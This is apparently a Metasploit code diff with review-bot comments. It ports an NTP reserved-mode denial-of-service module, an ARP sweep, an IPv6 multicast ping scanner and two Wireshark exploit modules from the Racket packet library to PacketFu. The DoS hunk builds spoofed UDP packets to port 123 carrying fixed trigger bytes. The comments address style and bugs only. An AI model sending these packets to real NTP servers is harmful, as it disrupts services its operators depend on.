diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb
index ddd2a88e87..696130d57b 100644
--- a/lib/msf/core/exploit/capture.rb
+++ b/lib/msf/core/exploit/capture.rb
@@ -166,7 +166,7 @@ module Exploit::Capture if not pcap raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" else - pcap.inject(pkt) + pcap.inject(pkt.to_s) # Can be a PacketFu Packet object or a pre-packed string end end
diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
index 233bf5e5cc..54041ff079 100644
--- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
+++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
@@ -10,8 +10,6 @@ ## require 'msf/core' -require 'racket' - class Metasploit3 < Msf::Auxiliary
@@ -57,25 +55,16 @@ class Metasploit3 < Msf::Auxiliary open_pcap - n = Racket::Racket.new + p = PacketFu::UDPPacket.new + p.ip_saddr = datastore['LHOST'] + p.ip_daddr = ip + p.ip_ttl = 255 + p.udp_src = 123 + p.udp_dst = 123 + p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)] + p.recalc + capture_sendto(p,ip) - n.l3 = Racket::L3::IPv4.new - n.l3.src_ip = datastore['LHOST'] - n.l3.dst_ip = ip - n.l3.protocol = 17 - n.l3.id = rand(0xffff)+1 - n.l3.ttl = 255 - - n.l4 = Racket::L4::UDP.new - n.l4.src_port = 123 - n.l4.dst_port = 123 - n.l4.payload = ["\x17","\x97\x00\x00\x00"][rand(2)] - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - - buff = n.pack - - capture_sendto(buff, ip) close_pcap end
diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb
index ca27b75460..63abb677f4 100644
--- a/modules/auxiliary/scanner/discovery/arp_sweep.rb
+++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb
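Review bot: `pcap.inject(pkt.to_s)` turns a nil `pkt` into `""` and hands a zero-length frame to the capture library, so a caller that forgot to build its packet fails somewhere inside that library (if it fails at all) rather than at this call. A guard before the inject, `raise ArgumentError, "pkt must be a PacketFu packet or a packed String" if pkt.nil?`, keeps the duck-typed `to_s` while making the mistake visible where it happens. The `def` of the enclosing method is outside the hunk, so I cannot see whether `pkt` is already checked on entry.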
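Review bot: The packet local in `run` is named `p`, which shadows `Kernel#p` for the rest of the method and reads like a stray debug call; `pkt` would be clearer, and `capture_sendto(p,ip)` is missing the space after the comma. The two payloads in `["\x17", "\x97\x00\x00\x00"][rand(2)]` are magic byte strings with no explanation, so a one-line comment saying what each of the two request variants is would help the next reader. The `def run` line is outside the hunk.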
@@ -67,24 +67,23 @@ class Metasploit3 < Msf::Auxiliary hosts.each do |dhost| if dhost != shost probe = buildprobe(shost, smac, dhost) - capture.inject(probe) + inject(probe) while(reply = getreply()) - next if not reply[:arp] - print_status("#{reply[:arp].spa} appears to be up.") - - report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) + next unless reply.is_arp? + print_status("#{reply.arp_saddr_ip} appears to be up.") + report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac) end + end end etime = Time.now.to_f + datastore['TIMEOUT'] while (Time.now.to_f < etime) while(reply = getreply()) - next if not reply[:arp] - print_status("#{reply[:arp].spa} appears to be up.") - - report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) + next unless reply.is_arp? + print_status("#{reply.arp_saddr_ip} appears to be up.") + report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac) end Kernel.select(nil, nil, nil, 0.50) end 
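Review bot: The lines that print and report an ARP reply are now duplicated in the probe loop and again in the drain loop after `etime` is computed; extracting them into a small helper keeps the two paths from drifting, and the `next unless reply.is_arp?` guard in each loop repeats a check that `getreply` (in the next hunk) already makes before returning a packet. `:mac=>reply.arp_saddr_mac` also wants spaces around `=>` to match `:host => ...` on the same line. The enclosing `run` method starts outside the hunk.
```ruby
      while (reply = getreply)
        report_reply(reply)
      end
# … unchanged: etime timeout and drain loop, whose body becomes the same report_reply(reply) call …

  # Print and record one ARP reply already filtered by getreply
  def report_reply(reply)
    print_status("#{reply.arp_saddr_ip} appears to be up.")
    report_host(:host => reply.arp_saddr_ip, :mac => reply.arp_saddr_mac)
  end
```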
@@ -95,31 +94,26 @@ class Metasploit3 < Msf::Auxiliary end def buildprobe(shost, smac, dhost) - n = Racket::Racket.new - n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14)) - n.l2.src_mac = smac - n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff' - n.l2.ethertype = 0x0806 - - n.l3 = Racket::L3::ARP.new - n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST - n.l3.sha = n.l2.src_mac - n.l3.tha = n.l2.dst_mac - n.l3.spa = shost - n.l3.tpa = dhost - n.pack + p = PacketFu::ARPPacket.new + p.eth_saddr = smac + p.eth_daddr = "ff:ff:ff:ff:ff:ff" + p.arp_opcode = 1 + p.arp_saddr_mac = p.eth_saddr + p.arp_daddr_mac = p.eth_daddr + p.arp_saddr_ip = shost + p.arp_daddr_ip = dhost + p.recalc + p end def getreply - pkt = capture.next - return if not pkt - - eth = Racket::L2::Ethernet.new(pkt) - return if not eth.ethertype == 0x0806 - - arp = Racket::L3::ARP.new(eth.payload) - return if not arp.opcode == Racket::L3::ARP::ARPOP_REPLY - - {:raw => pkt, :eth => eth, :arp => arp} + pkt_bytes = capture.next + Kernel.select(nil,nil,nil,0.1) + return unless pkt_bytes + pkt = PacketFu::Packet.parse(pkt_bytes) + return unless pkt.is_arp? + return unless pkt.arp_opcode == 2 + pkt end + end
diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
index be28f1d0fb..63bc1b1968 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
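Review bot: In `getreply` the new `Kernel.select(nil,nil,nil,0.1)` runs after `capture.next` and before the nil check, so when nothing was waiting the method sleeps 100 ms and then returns nil without polling again, and when a frame was read it only delays its processing; unless the pause is meant purely to pace the sweep, it never helps catch a late reply. If a settle time is intended, poll once more after it: `pkt_bytes = capture.next` / `Kernel.select(nil, nil, nil, 0.1) unless pkt_bytes` / `pkt_bytes ||= capture.next`. In `buildprobe`, `p` shadows `Kernel#p`, and the bare `1` in `p.arp_opcode = 1` and `2` in `pkt.arp_opcode == 2` deserve `# ARP request` and `# ARP reply` comments, since the Racket `ARPOP_REQUEST`/`ARPOP_REPLY` constants they replace carried that meaning in their names.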
@@ -36,34 +36,30 @@ class Metasploit3 < Msf::Auxiliary max_epoch = ::Time.now.to_i + timeout while(::Time.now.to_i < max_epoch) - pkt = capture.next() + pkt_bytes = capture.next() Kernel.select(nil,nil,nil,0.1) - next if not pkt - eth = Racket::L2::Ethernet.new(pkt) - - next if not eth.ethertype.eql?(Racket::L2::Ethernet::ETHERTYPE_IPV6) - ipv6 = Racket::L3::IPv6.new(eth.payload) - - next if not ipv6.nhead == 0x3a - icmpv6 = Racket::L4::ICMPv6.new(ipv6.payload) - - next if not icmpv6.type == Racket::L4::ICMPv6Generic::ICMPv6_TYPE_ECHO_REPLY - - icmpv6 = Racket::L4::ICMPv6EchoReply.new(ipv6.payload) - host_addr = Racket::L3::Misc.long2ipv6(ipv6.src_ip) - host_mac = eth.src_mac - - if(!hosts[host_addr].eql?(host_mac)) + next if not pkt_bytes + p = PacketFu::Packet.parse(pkt_bytes) + # Don't bother checking if it's an echo reply, since Neighbor Solicitations + # and any other response is just as good. + next unless p.is_ipv6? + host_addr = p.ipv6_saddr + host_mac = p.eth_saddr + next if host_mac == smac + unless hosts[host_addr] == host_mac hosts[host_addr] = host_mac print_status(" |*| #{host_addr} => #{host_mac}") - # report_host(:mac => host_mac, :host => host_addr) end end - return(hosts) + return hosts + end + + def smac + datastore['SMAC'].to_s.empty? ? ipv6_mac : datastore['SMAC'] end def run - # Start caputre + # Start capture open_pcap({'FILTER' => "icmp6"}) # Send ping
diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
index f189faa3b1..afc1800a58 100644
--- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
+++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
@@ -11,7 +11,6 @@ require 'msf/core' -require 'racket' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking
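Review bot: The new self-filter `next if host_mac == smac` compares `p.eth_saddr` with the raw `datastore['SMAC']` string whenever SMAC is set, so a MAC typed in upper case or with a different separator would not match and the scanner would list its own address (I am assuming `eth_saddr` yields the lower-case colon form, as PacketFu does); normalizing both sides, `next if host_mac.downcase == smac.to_s.downcase`, avoids the mismatch. `next if not pkt_bytes` sits beside `next unless p.is_ipv6?` and should use the same `unless` form, and `p` shadows `Kernel#p` for the rest of the loop. The explicit `return hosts` can simply be `hosts`; the enclosing method's `def` is outside the hunk.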
diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
index 74a6e92f04..7980f38e83 100644
--- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
+++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
@@ -10,7 +10,6 @@ ## require 'msf/core' -require 'racket' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking